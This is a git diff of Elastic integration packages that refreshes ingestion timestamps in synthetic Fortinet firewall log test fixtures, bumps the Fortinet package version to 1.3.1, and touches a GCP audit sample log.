@@ -918,7 +918,7 @@ }, "message": "logver=tesseq devname=\"nimides\" devid=\"iusmodte\" vd=involup date=2019-1-19 time=1:25:23 logid=edd type=dolorsi subtype=mcolabo level=low eventtime=exe logtime=nve srcip=10.226.255.3 srcport=5449 srcintf=lo7680 srcintfrole=iaconseq dstip=10.123.59.69 dstport=5399 dstintf=lo5835 dstintfrole=ntsunti poluuid=bor sessionid=uisnos proto=6 action=accept policyid=tation policytype=seddoe crscore=21.625000 craction=eur crlevel=ntmolli appcat=pitl service=nulap srccountry=ipexe dstcountry=aqueipsa trandisp=psum tranip=10.53.251.202 tranport=7501 duration=131.751000 sentbyte=6876 rcvdbyte=220 sentpkt=ugi app=ptate", "event": { - "ingested": "2021-06-29T09:33:01.618601800Z" + "ingested": "2021-12-09T13:37:31.907237300Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "logver=rur devname=\"edut\" devid=\"sitametc\" vd=iarchite date=2019-2-2 time=8:27:57 logid=uide type=iono subtype=aboris level=very-high eventtime=imidest logtime=ulamc srcip=10.3.85.176 srcport=318 srcintf=eth2546 srcintfrole=uptateve dstip=10.212.56.26 dstport=3032 dstintf=enp0s2353 dstintfrole=loin poluuid=cinge sessionid=tutl proto=udp action=block policyid=nesciu policytype=ueip crscore=162.484000 craction=orumSe crlevel=mSe appcat=itame service=quaturv srccountry=lumdolor dstcountry=persp trandisp=leumi tranip=10.29.141.252 tranport=2077 duration=106.468000 sentbyte=3472 rcvdbyte=7868 sentpkt=orum app=reseos", "event": { - "ingested": "2021-06-29T09:33:01.618608900Z" + "ingested": "2021-12-09T13:37:31.907243600Z" }, "tags": [ "preserve_original_event" 
@@ -942,7 +942,7 @@ }, "message": "date=2019-2-17 time=3:30:32 devname=orem device_id=seq log_id=cus type=generic subtype=tnulap pri=very-high devid=psamvolu devname=inculp logid=eni type=tcupid subtype=ercita level=very-high vd=olorinr srcip=10.110.166.81 srcport=7354 srcintf=lo3023 dstip=10.181.48.82 dstport=1225 dstintf=eth7640 poluuid=conseq sessionid=Nemoen proto=6 action=cancel policyid=umquamei trandisp=nih duration=55.527000 sentbyte=3449 rcvdbyte=4658 devtype=quia osname=eabill osversion=1.95 mastersrcmac=oeiusmo srcmac=01:00:5e:82:ca:1b crscore=67.321000 craction=rumwrit crlevel=tionofd eventtype=ill user=orroquis service=laparia hostname=emveleu4029.api.local profile=tconse reqtype=ntsun url=https://internal.example.net/inc/riaturEx.htm?mnihilm=itinvo#lestia direction=external msg=metcons method=lumd cat=liquaUt catdesc=snos device_id=maccusan log_id=oeni pri=medium userfrom=tiaecon adminprof=tincu timezone=GMT-07:00 main_type=untmoll trigger_policy=par sub_type=idatatno severity_level=tfugit policy=tla src=10.126.11.186 src_port=589 dst=10.236.175.163 dst_port=6562 http_method=atemqui http_url=icaboN http_host=Utenimad http_agent=res http_session_id=officiad signature_subclass=nsectet signature_id=3977 srccountry=temU content_switch_name=ciduntut server_pool_name=ionofd false_positive_mitigation=etqua user_name=udantiu monitor_status=tium http_refer=https://internal.example.net/leumiu/iuta.html?tfugit=rorsitv#tiaecons http_version=uamestq dev_id=aliquaUt threat_weight=boreet history_threat_weight=mquam threat_level=volu ftp_mode=nof ftp_cmd=boNe cipher_suite=ovolu msg_id=cid", "event": { - "ingested": "2021-06-29T09:33:01.618617900Z" + "ingested": "2021-12-09T13:37:31.907248900Z" }, "tags": [ "preserve_original_event" 
@@ -954,7 +954,7 @@ }, "message": "logver=equamn devname=\"mes\" devid=\"itatio\" vd=ssecillu date=2019-3-3 time=10:33:06 logid=oeius type=itin subtype=nostrud level=medium eventtime=byCic logtime=mnisiuta srcip=10.171.60.173 srcport=209 srcintf=lo1917 srcintfrole=usmodite dstip=10.11.150.136 dstport=3615 dstintf=lo5438 dstintfrole=olup poluuid=urQuis sessionid=iquip proto=1 action=cancel policyid=untutl policytype=elite crscore=176.898000 craction=ipsaq crlevel=spici appcat=nvolupt service=antiu srccountry=llumquid dstcountry=paq trandisp=olup tranip=10.83.98.220 tranport=1300 duration=73.115000 sentbyte=5812 rcvdbyte=3339 sentpkt=amquis app=umtotam", "event": { - "ingested": "2021-06-29T09:33:01.618623600Z" + "ingested": "2021-12-09T13:37:31.907270400Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "logver=pitlabo dtime=2019-03-17 17:35:40.532538723 +0000 UTC devid=lorsita devname=datatno vd=emac date=2019-3-17 time=5:35:40 logid=uiavo type=tdo subtype=ratvolup level=high eventtime=dolo logtime=quioffic srcip=10.238.49.73 srcport=1554 srcintf=enp0s11 srcintfrole=riatu dstip=10.74.88.209 dstport=740 dstintf=lo5287 dstintfrole=quep poluuid=tfugitse sessionid=oenimips proto=udp action=deny policyid=mdo policytype=map crscore=148.871000 craction=osqui crlevel=consequ appcat=catcupid service=velitess srccountry=sit dstcountry=ipisc trandisp=onsectet tranip=10.92.3.166 tranport=5777 duration=156.314000 sentbyte=715 rcvdbyte=3946 sentpkt=itvol app=dolo", "event": { - "ingested": "2021-06-29T09:33:01.618628900Z" + "ingested": "2021-12-09T13:37:31.907275800Z" }, "tags": [ "preserve_original_event" 
@@ -978,7 +978,7 @@ }, "message": "logver=amquisno dtime=2019-04-01 00:38:14.792538723 +0000 UTC devid=uptasnul devname=ptate vd=deri date=2019-4-1 time=12:38:14 logid=periamea type=equatD subtype=quaturQu level=high eventtime=rpo logtime=inr srcip=10.119.248.36 srcport=2450 srcintf=enp0s1885 srcintfrole=ten dstip=10.187.107.47 dstport=288 dstintf=lo2445 dstintfrole=fugia poluuid=psa sessionid=iset proto=prm action=allow policyid=ecte policytype=ionemull crscore=84.399000 craction=sBo crlevel=nimides appcat=iurere service=edolorin srccountry=labor dstcountry=quelaud trandisp=ira tranip=10.84.200.121 tranport=3226 duration=128.212000 sentbyte=2150 rcvdbyte=4329 sentpkt=nos app=icta", "event": { - "ingested": "2021-06-29T09:33:01.618636400Z" + "ingested": "2021-12-09T13:37:31.907281300Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "logver=itseddo devname=\"tasu\" devid=\"mquae\" vd=CSedu date=2019-4-15 time=7:40:49 logid=atae type=aeconseq subtype=boNemo level=very-high eventtime=nemulla logtime=tmollit srcip=10.167.128.229 srcport=4052 srcintf=eth1833 srcintfrole=ciatisu dstip=10.135.213.17 dstport=6427 dstintf=eth6468 dstintfrole=ritat poluuid=dipi sessionid=asnulapa proto=prm action=block policyid=onsequa policytype=seddoe crscore=23.021000 craction=Bonorume crlevel=emeumfu appcat=tla service=uidexea srccountry=odtem dstcountry=nvolupt trandisp=stia tranip=10.30.239.222 tranport=1546 duration=10.721000 sentbyte=6561 rcvdbyte=1057 sentpkt=itectobe app=rroq", "event": { - "ingested": "2021-06-29T09:33:01.618643800Z" + "ingested": "2021-12-09T13:37:31.907286700Z" }, "tags": [ "preserve_original_event" 
@@ -1002,7 +1002,7 @@ }, "message": "date=2019-4-29 time=2:43:23 devname=uunt device_id=pic log_id=unt type=generic subtype=emUt pri=medium devid=pernatur devname=orem logid=enbyCice type=velil subtype=nsequat level=low vd=duntutl srcip=10.238.172.76 srcport=156 srcintf=lo1215 dstip=10.201.119.253 dstport=2230 dstintf=enp0s7218 poluuid=nimad sessionid=tionu proto=udp action=block policyid=emagna trandisp=quin duration=68.078000 sentbyte=2527 rcvdbyte=1150 devtype=consequ osname=min osversion=1.1028 mastersrcmac=edicta srcmac=01:00:5e:cd:6c:ed crscore=163.905000 craction=itinvolu crlevel=urerepre eventtype=iumdol user=serror service=uptass hostname=rspic5637.api.local profile=itatise reqtype=iut url=https://api.example.net/ita/esse.txt?amquis=iatquovo#rExce direction=inbound msg=uraut method=reetdol cat=umtotam catdesc=itaedi device_id=ant log_id=tiumt pri=very-high userfrom=ratvolup adminprof=iamqu timezone=CT main_type=quaturve trigger_policy=tsunti sub_type=ero severity_level=iusmodi policy=acomm src=10.169.133.219 src_port=92 dst=10.115.166.48 dst_port=7491 http_method=eleumiur http_url=ididun http_host=edi http_agent=gia http_session_id=uaturQui signature_subclass=emi signature_id=5446 srccountry=etM content_switch_name=eve server_pool_name=iru false_positive_mitigation=ipit user_name=emq monitor_status=elitsedq http_refer=https://www.example.net/onsequat/emagnaa.gif?itse=tco#nnumqua http_version=erit dev_id=lorsitam threat_weight=emagnama history_threat_weight=ute threat_level=Excep ftp_mode=utpersp ftp_cmd=rehe cipher_suite=tiumt msg_id=ulamc", "event": { - "ingested": "2021-06-29T09:33:01.618648500Z" + "ingested": "2021-12-09T13:37:31.907292100Z" }, "tags": [ "preserve_original_event" 
@@ -1014,7 +1014,7 @@ }, "message": "logver=runt date=2019-5-13 time=9:45:57 log_id=emipsu devid=icaboNem devname=Except logid=fugits type=maliquam subtype=mav level=very-high vd=ecill srcip=10.36.122.89 srcport=5040 srcintf=lo3887 dstip=10.206.76.186 dstport=741 dstintf=eth2435 poluuid=atisund sessionid=enbyCic proto=1 action=block policyid=nrepre trandisp=uisautem duration=145.667000 sentbyte=4247 rcvdbyte=4374 devtype=tio osname=aconseq osversion=1.4195 mastersrcmac=enatuser srcmac=01:00:5e:1a:9c:4f crscore=124.786000 craction=rcitatio crlevel=olore eventtype=ntexp user=atio service=roquisqu hostname=rror3870.www5.local profile=volu reqtype=occ url=https://www5.example.net/culpa/isun.txt?cola=tura#rat direction=internal msg=sect method=ing cat=nis catdesc=aboreet device_id=ulapari log_id=isetqu pri=high userfrom=ons adminprof=Sedu timezone=CEST main_type=icaboNem trigger_policy=enderi sub_type=edqu severity_level=cita policy=uidolore src=10.146.255.40 src_port=3003 dst=10.226.39.82 dst_port=3950 http_method=oluptate http_url=orumwrit http_host=aconse http_agent=ites http_session_id=abori signature_subclass=dolor signature_id=3543 srccountry=amqu content_switch_name=uamest server_pool_name=ntoccaec false_positive_mitigation=ites user_name=caecatcu monitor_status=iof http_refer=https://api.example.com/uae/mdolo.txt?aute=itatise#utpers http_version=equunt dev_id=Nemo threat_weight=itse history_threat_weight=lillumq threat_level=idid ftp_mode=uis ftp_cmd=velits cipher_suite=mmodo msg_id=rporissu", "event": { - "ingested": "2021-06-29T09:33:01.618652200Z" + "ingested": "2021-12-09T13:37:31.907297600Z" }, "tags": [ "preserve_original_event" 
@@ -1026,7 +1026,7 @@ }, "message": "logver=utemvel dtime=2019-05-28 04:48:31.832538723 +0000 UTC devid=exercita devname=emaperi vd=aspernat date=2019-5-28 time=4:48:31 logid=ddoei type=nihi subtype=umfu level=low eventtime=ehen logtime=olupt srcip=10.53.82.96 srcport=7088 srcintf=eth297 srcintfrole=nostru dstip=10.224.212.88 dstport=5404 dstintf=lo4266 dstintfrole=natuserr poluuid=ipi sessionid=eniamqui proto=icmp action=deny policyid=urvelill policytype=iadese crscore=174.116000 craction=isundeo crlevel=emq appcat=rehender service=uat srccountry=apa dstcountry=tani trandisp=per tranip=10.35.240.70 tranport=2587 duration=62.993000 sentbyte=7102 rcvdbyte=2380 sentpkt=ataevit app=chi", "event": { - "ingested": "2021-06-29T09:33:01.618656100Z" + "ingested": "2021-12-09T13:37:31.907303100Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "logver=lorsita devname=\"oeius\" devid=\"trud\" vd=aco date=2019-6-11 time=11:51:06 logid=uei type=tsedqu subtype=agni level=very-high eventtime=rsint logtime=catc srcip=10.186.253.240 srcport=6982 srcintf=enp0s5429 srcintfrole=end dstip=10.233.128.7 dstport=2455 dstintf=eth5315 dstintfrole=onnumq poluuid=lupt sessionid=ugiatq proto=prm action=cancel policyid=utla policytype=iosamn crscore=164.209000 craction=tor crlevel=toreve appcat=ita service=orain srccountry=tnulap dstcountry=aevitae trandisp=aqu tranip=10.66.149.234 tranport=6236 duration=128.130000 sentbyte=6344 rcvdbyte=475 sentpkt=loremeu app=tate", "event": { - "ingested": "2021-06-29T09:33:01.618659500Z" + "ingested": "2021-12-09T13:37:31.907308500Z" }, "tags": [ "preserve_original_event" 
@@ -1050,7 +1050,7 @@ }, "message": "logver=elaud dtime=2019-06-25 18:53:40.352538723 +0000 UTC devid=iad devname=irat vd=upi date=2019-6-25 time=6:53:40 logid=rsintocc type=itanim subtype=sinto level=medium eventtime=lore logtime=eabi srcip=10.227.133.134 srcport=3351 srcintf=enp0s4820 srcintfrole=erspici dstip=10.46.11.114 dstport=4009 dstintf=enp0s7159 dstintfrole=oremq poluuid=rspiciat sessionid=ptas proto=tcp action=cancel policyid=ore policytype=dut crscore=128.554000 craction=remape crlevel=itectob appcat=sedquia service=mquisnos srccountry=mwritt dstcountry=avolupt trandisp=lumdolo tranip=10.173.140.201 tranport=6422 duration=133.394000 sentbyte=7249 rcvdbyte=1387 sentpkt=str app=sit", "event": { - "ingested": "2021-06-29T09:33:01.618664500Z" + "ingested": "2021-12-09T13:37:31.907313900Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "logver=elillum dtime=2019-07-10 01:56:14.612538723 +0000 UTC devid=isnos devname=emp vd=eos date=2019-7-10 time=1:56:14 logid=sciveli type=Bonoru subtype=rai level=low eventtime=omm logtime=cepteu srcip=10.205.18.11 srcport=6737 srcintf=eth4759 srcintfrole=ueipsa dstip=10.69.130.207 dstport=1191 dstintf=eth614 dstintfrole=architec poluuid=era sessionid=ptatem proto=udp action=cancel policyid=isi policytype=ssecill crscore=44.181000 craction=exerci crlevel=ptatemUt appcat=temqu service=ofd srccountry=nimvenia dstcountry=ari trandisp=eir tranip=10.170.236.123 tranport=4346 duration=150.036000 sentbyte=6877 rcvdbyte=1751 sentpkt=orum app=tation", "event": { - "ingested": "2021-06-29T09:33:01.618669800Z" + "ingested": "2021-12-09T13:37:31.907319300Z" }, "tags": [ "preserve_original_event" 
@@ -1074,7 +1074,7 @@ }, "message": "logver=repre date=2019-7-24 time=8:58:48 log_id=ore devid=ionemu devname=rehend logid=uiad type=tasu subtype=sciun level=high vd=taev srcip=10.196.124.206 srcport=7569 srcintf=enp0s2181 dstip=10.186.88.110 dstport=4203 dstintf=enp0s5497 poluuid=asnulapa sessionid=hende proto=0 action=deny policyid=ntmolli trandisp=uto duration=178.755000 sentbyte=6361 rcvdbyte=1742 devtype=ipsu osname=taedi osversion=1.2682 mastersrcmac=acom srcmac=01:00:5e:99:e3:a5 crscore=175.099000 craction=Cic crlevel=aturveli eventtype=lica user=Exc service=amvolup hostname=velill3821.mail.invalid profile=asnulap reqtype=usmodte url=https://example.com/loremag/mqu.gif?bore=lapari#aborios direction=external msg=lorem method=mnisiuta cat=quiadolo catdesc=abo device_id=msequine log_id=mrem pri=medium userfrom=atuserr adminprof=nsequatu timezone=ET main_type=uptasnu trigger_policy=atemUt sub_type=iurere severity_level=oident policy=volup src=10.97.254.192 src_port=302 dst=10.124.34.251 dst_port=3899 http_method=imide http_url=sequa http_host=ine http_agent=ollitan http_session_id=eacomm signature_subclass=onseq signature_id=6250 srccountry=reetd content_switch_name=equamnih server_pool_name=tevelite false_positive_mitigation=sitvolup user_name=epor monitor_status=atatnonp http_refer=https://example.org/elauda/ria.htm?uptatemU=iono#quun http_version=itationu dev_id=eniamqui threat_weight=adolo history_threat_weight=oreetdol threat_level=uinesciu ftp_mode=sciun ftp_cmd=tametc cipher_suite=rExcep msg_id=avolup", "event": { - "ingested": "2021-06-29T09:33:01.618676200Z" + "ingested": "2021-12-09T13:37:31.907324700Z" }, "tags": [ "preserve_original_event" 
@@ -1086,7 +1086,7 @@ }, "message": "logver=olores devname=\"ineavol\" devid=\"bori\" vd=taev date=2019-8-7 time=4:01:23 logid=ngelit type=uidexea subtype=stiaec level=very-high eventtime=quipex logtime=rsintoc srcip=10.9.41.221 srcport=4010 srcintf=eth434 srcintfrole=estlabor dstip=10.81.58.91 dstport=2247 dstintf=lo6072 dstintfrole=udexerci poluuid=onemul sessionid=elaud proto=tcp action=cancel policyid=trudexe policytype=tiumtota crscore=53.861000 craction=ariaturE crlevel=fug appcat=umqu service=umqu srccountry=roide dstcountry=tio trandisp=autem tranip=10.204.98.238 tranport=3885 duration=108.380000 sentbyte=2498 rcvdbyte=3936 sentpkt=aquioffi app=aliqui", "event": { - "ingested": "2021-06-29T09:33:01.618683400Z" + "ingested": "2021-12-09T13:37:31.907329700Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "date=2019-8-21 time=11:03:57 devname=unti device_id=tena log_id=velits type=event subtype=oditautf pri=high desc=rmagni user=tiono userfrom=utemvele msg=taevi action=cancel adom=xplicabo4308.www.example session_id=tquo", "event": { - "ingested": "2021-06-29T09:33:01.618690500Z" + "ingested": "2021-12-09T13:37:31.907333Z" }, "tags": [ "preserve_original_event" 
@@ -1110,7 +1110,7 @@ }, "message": "logver=nrepr devname=\"uipex\" devid=\"alorumw\" vd=nibus date=2019-9-5 time=6:06:31 logid=eiusmo type=rci subtype=seosquir level=medium eventtime=ume logtime=ercitati srcip=10.35.84.125 srcport=341 srcintf=enp0s2388 srcintfrole=pernatu dstip=10.37.120.29 dstport=4170 dstintf=enp0s1127 dstintfrole=tasuntex poluuid=etura sessionid=taedi proto=udp action=accept policyid=quiacon policytype=udexerc crscore=66.169000 craction=undeomni crlevel=ritquiin appcat=taspern service=iadeser srccountry=nos dstcountry=mollita trandisp=eserun tranip=10.212.208.70 tranport=3237 duration=36.569000 sentbyte=5330 rcvdbyte=11 sentpkt=otamr app=eveli", "event": { - "ingested": "2021-06-29T09:33:01.618697600Z" + "ingested": "2021-12-09T13:37:31.907337300Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "logver=temsequi devname=\"aturvel\" devid=\"elaudan\" vd=alorum date=2019-9-19 time=1:09:05 logid=olor type=inesc subtype=tlaborio level=high eventtime=equeporr logtime=seq srcip=10.143.65.84 srcport=2670 srcintf=enp0s5828 srcintfrole=ddoeiu dstip=10.199.201.26 dstport=3770 dstintf=eth4236 dstintfrole=ore poluuid=onse sessionid=abo proto=1 action=accept policyid=magnaa policytype=tateveli crscore=94.258000 craction=xplica crlevel=dex appcat=rsintocc service=iusmo srccountry=oquisqu dstcountry=ullamcor trandisp=remagn tranip=10.207.207.106 tranport=2048 duration=94.877000 sentbyte=6896 rcvdbyte=7419 sentpkt=tvolup app=ites", "event": { - "ingested": "2021-06-29T09:33:01.618704900Z" + "ingested": "2021-12-09T13:37:31.907342100Z" }, "tags": [ "preserve_original_event" 
@@ -1134,7 +1134,7 @@ }, "message": "logver=rExce dtime=2019-10-03 20:11:40.172538723 +0000 UTC devid=rittenby devname=gni vd=ritq date=2019-10-3 time=8:11:40 logid=lestiaec type=rissusci subtype=fdeFi level=high eventtime=ehende logtime=riatu srcip=10.204.27.48 srcport=5998 srcintf=lo7358 srcintfrole=emaperia dstip=10.163.236.253 dstport=7768 dstintf=enp0s2100 dstintfrole=sequatu poluuid=ugi sessionid=oditau proto=1 action=block policyid=mvele policytype=atae crscore=123.668000 craction=imips crlevel=admi appcat=ocons service=tiumdol srccountry=sunt dstcountry=rrorsi trandisp=remagna tranip=10.41.61.88 tranport=426 duration=82.943000 sentbyte=525 rcvdbyte=3702 sentpkt=dolor app=ips", "event": { - "ingested": "2021-06-29T09:33:01.618712200Z" + "ingested": "2021-12-09T13:37:31.907346800Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "logver=ipitlab dtime=2019-10-18 03:14:14.432538723 +0000 UTC devid=ipsa devname=dents vd=erepreh date=2019-10-18 time=3:14:14 logid=amest type=dolore subtype=xer level=medium eventtime=onemul logtime=off srcip=10.246.81.164 srcport=3453 srcintf=lo3071 srcintfrole=ende dstip=10.185.44.26 dstport=3193 dstintf=lo7861 dstintfrole=tationul poluuid=tam sessionid=byCic proto=0 action=cancel policyid=cons policytype=serro crscore=5.473000 craction=uiac crlevel=aecatcu appcat=sed service=uisnostr srccountry=aquei dstcountry=ation trandisp=sumqu tranip=10.53.110.111 tranport=2549 duration=141.141000 sentbyte=5569 rcvdbyte=5239 sentpkt=entore app=uaturQ", "event": { - "ingested": "2021-06-29T09:33:01.618719400Z" + "ingested": "2021-12-09T13:37:31.907351Z" }, "tags": [ "preserve_original_event" 
@@ -1158,7 +1158,7 @@ }, "message": "logver=xpli date=2019-11-1 time=10:16:48 log_id=quae devid=totamre devname=lam logid=quamestq type=porai subtype=oinve level=medium vd=hender srcip=10.84.154.230 srcport=1335 srcintf=enp0s1127 dstip=10.212.63.179 dstport=6790 dstintf=eth1762 poluuid=eufugia sessionid=temqu proto=3 action=allow policyid=tvolup trandisp=lori duration=130.339000 sentbyte=4763 rcvdbyte=4334 devtype=rnatur osname=etdolo osversion=1.802 mastersrcmac=adipisci srcmac=01:00:5e:7b:68:0e crscore=36.122000 craction=culpaq crlevel=quis eventtype=lupt user=upt service=aboN hostname=cupida6106.www5.local profile=tdo reqtype=asperna url=https://api.example.com/aco/empo.jpg?iumdol=iusm#ido direction=unknown msg=peri method=aspernat cat=seq catdesc=olup device_id=uamqu log_id=veli pri=high userfrom=etco adminprof=nulap timezone=CT main_type=radip trigger_policy=tali sub_type=ntin severity_level=loreseos policy=ites src=10.109.172.90 src_port=2785 dst=10.146.77.206 dst_port=1554 http_method=amnihilm http_url=ipsamv http_host=proid http_agent=xcep http_session_id=udantium signature_subclass=sum signature_id=1723 srccountry=iaecon content_switch_name=euf server_pool_name=norume false_positive_mitigation=hilmo user_name=aquaeab monitor_status=eporr http_refer=https://www.example.com/metMalo/santiu.jpg?icon=enderit#roquisqu http_version=lapa dev_id=imadm threat_weight=giatquo history_threat_weight=oeiusm threat_level=oreeuf ftp_mode=iusmodt ftp_cmd=umwrit cipher_suite=atatn msg_id=uatD", "event": { - "ingested": "2021-06-29T09:33:01.618726700Z" + "ingested": "2021-12-09T13:37:31.907354700Z" }, "tags": [ "preserve_original_event" 
@@ -1170,7 +1170,7 @@ }, "message": "date=2019-11-15 time=5:19:22 devname=ptate device_id=Nemoe log_id=cupidat type=generic subtype=onsequ pri=high devid=nostr devname=umtotam logid=mqua type=emU subtype=gnido level=very-high vd=plicab srcip=10.8.161.226 srcport=3191 srcintf=eth5256 dstip=10.13.234.237 dstport=3760 dstintf=enp0s1149 poluuid=oeiusmo sessionid=nisi proto=6 action=allow policyid=lupt trandisp=tlaborio duration=18.804000 sentbyte=1061 rcvdbyte=6464 devtype=itan osname=iquidexe osversion=1.2314 mastersrcmac=fugia srcmac=01:00:5e:09:8f:0e crscore=5.320000 craction=onof crlevel=quam eventtype=rure user=ipis service=liqu hostname=unt2122.internal.local profile=orsitame reqtype=tassitas url=https://example.org/uidolor/turve.htm?temporai=uasiarch#ect direction=unknown msg=occae method=lpaqu cat=minimav catdesc=col device_id=riamea log_id=ern pri=low userfrom=odtempo adminprof=con timezone=CEST main_type=offici trigger_policy=uipexe sub_type=ium severity_level=quamqua policy=nsequatu src=10.38.18.72 src_port=3177 dst=10.202.250.141 dst_port=1824 http_method=volu http_url=quatDui http_host=stenat http_agent=liquip http_session_id=eiusmodt signature_subclass=dmi signature_id=4174 srccountry=ameaque content_switch_name=pitlabor server_pool_name=essequa false_positive_mitigation=ini user_name=maperia monitor_status=ovolup http_refer=https://mail.example.com/veniamq/uisno.htm?luptas=omm#eaquei http_version=iveli dev_id=lill threat_weight=voluptat history_threat_weight=aturveli threat_level=incidunt ftp_mode=tatnonp ftp_cmd=abi cipher_suite=nimave msg_id=atu", "event": { - "ingested": "2021-06-29T09:33:01.618734Z" + "ingested": "2021-12-09T13:37:31.907358500Z" }, "tags": [ "preserve_original_event" 
@@ -1182,7 +1182,7 @@ }, "message": "logver=siu date=2019-11-30 time=12:21:57 log_id=inrepr devid=cero devname=ita logid=xercitat type=meumfug subtype=umt level=very-high vd=laparia srcip=10.195.87.127 srcport=760 srcintf=lo3094 dstip=10.52.118.202 dstport=6556 dstintf=enp0s5751 poluuid=ectobe sessionid=rehender proto=udp action=block policyid=orinc trandisp=tcons duration=52.473000 sentbyte=7043 rcvdbyte=4714 devtype=suscipi osname=imipsam osversion=1.4674 mastersrcmac=hilm srcmac=01:00:5e:73:ca:c1 crscore=54.412000 craction=etd crlevel=erspici eventtype=tfug user=atatno service=sed hostname=luptat2613.internal.localhost profile=olupt reqtype=mipsum url=https://www.example.net/Maloru/lapariat.htm?tlabori=rehender#odtempo direction=inbound msg=alorum method=tmollit cat=bori catdesc=antium device_id=reetdo log_id=rchitec pri=medium userfrom=cipitlab adminprof=venia timezone=CT main_type=quid trigger_policy=mwrit sub_type=cid severity_level=lupt policy=adipisc src=10.182.124.88 src_port=116 dst=10.139.144.75 dst_port=5037 http_method=utodi http_url=isiutali http_host=oremeu http_agent=mquaerat http_session_id=conse signature_subclass=mestq signature_id=5535 srccountry=turQuisa content_switch_name=itasper server_pool_name=cidu false_positive_mitigation=ips user_name=modo monitor_status=ela http_refer=https://example.org/unti/niamqu.html?ris=veli#giatnu http_version=tanimide dev_id=ectetur threat_weight=umexer history_threat_weight=nim threat_level=nisiuta ftp_mode=cipitla ftp_cmd=ditautf cipher_suite=oluptasn msg_id=madmin", "event": { - "ingested": "2021-06-29T09:33:01.618741200Z" + "ingested": "2021-12-09T13:37:31.907361900Z" }, "tags": [ "preserve_original_event" 
@@ -1194,7 +1194,7 @@ }, "message": "date=2019-12-14 time=7:24:31 logver=imadm devid=stla devname=cab logid=orr type=olu subtype=quatDu level=low vd=siste srcip=10.151.47.249 srcport=6697 srcintf=lo5632 dstip=10.155.194.6 dstport=3005 dstintf=enp0s6106 poluuid=quatDu sessionid=deFinib proto=HOPOPT action=block policyid=taedic trandisp=ffi duration=130.219000 sentbyte=2693 rcvdbyte=568 devtype=consequ osname=rumw osversion=1.1386 mastersrcmac=temveleu srcmac=01:00:5e:df:96:27 crscore=104.315000 craction=item crlevel=remipsum eventtype=olupt user=usc service=ernat hostname=neavo4796.internal.domain profile=tatemac reqtype=exer url=https://www5.example.com/xea/ssecill.html?quianonn=quun#one direction=internal msg=riame method=uaUte cat=quae catdesc=utlabor device_id=ameius log_id=tate pri=very-high userfrom=lupta adminprof=atemseq timezone=CEST main_type=amcolab trigger_policy=ectobea sub_type=itsedq severity_level=pta policy=remipsu src=10.35.10.19 src_port=3941 dst=10.188.124.185 dst_port=5837 http_method=tali http_url=tasper http_host=amquisn http_agent=esciu http_session_id=iamea signature_subclass=perspi signature_id=7117 srccountry=emaccus content_switch_name=expl server_pool_name=giat false_positive_mitigation=uscipi user_name=dolo monitor_status=tionevol http_refer=https://internal.example.com/uptatema/dutpers.htm?tion=iumdol#ept http_version=Mal dev_id=tquasia threat_weight=ficiad history_threat_weight=roinBC threat_level=eufu ftp_mode=tio ftp_cmd=equatDu cipher_suite=exea msg_id=tasnulap", "event": { - "ingested": "2021-06-29T09:33:01.618748400Z" + "ingested": "2021-12-09T13:37:31.907366100Z" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/manifest.yml b/packages/fortinet/manifest.yml index f352747ee1a..d4143322123 100644 --- a/packages/fortinet/manifest.yml +++ b/packages/fortinet/manifest.yml 
@@ -1,6 +1,6 @@
 name: fortinet
 title: Fortinet Logs
-version: 1.3.0
+version: 1.3.1
 release: ga
 description: Collect logs from Fortinet instances with Elastic Agent.
 type: integration
diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/audit.log b/packages/gcp/_dev/deploy/docker/sample_logs/audit.log
index 9c228890527..1d846e9557c 100644
--- a/packages/gcp/_dev/deploy/docker/sample_logs/audit.log
+++ b/packages/gcp/_dev/deploy/docker/sample_logs/audit.log
@@ -3,5 +3,5 @@
 {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} 
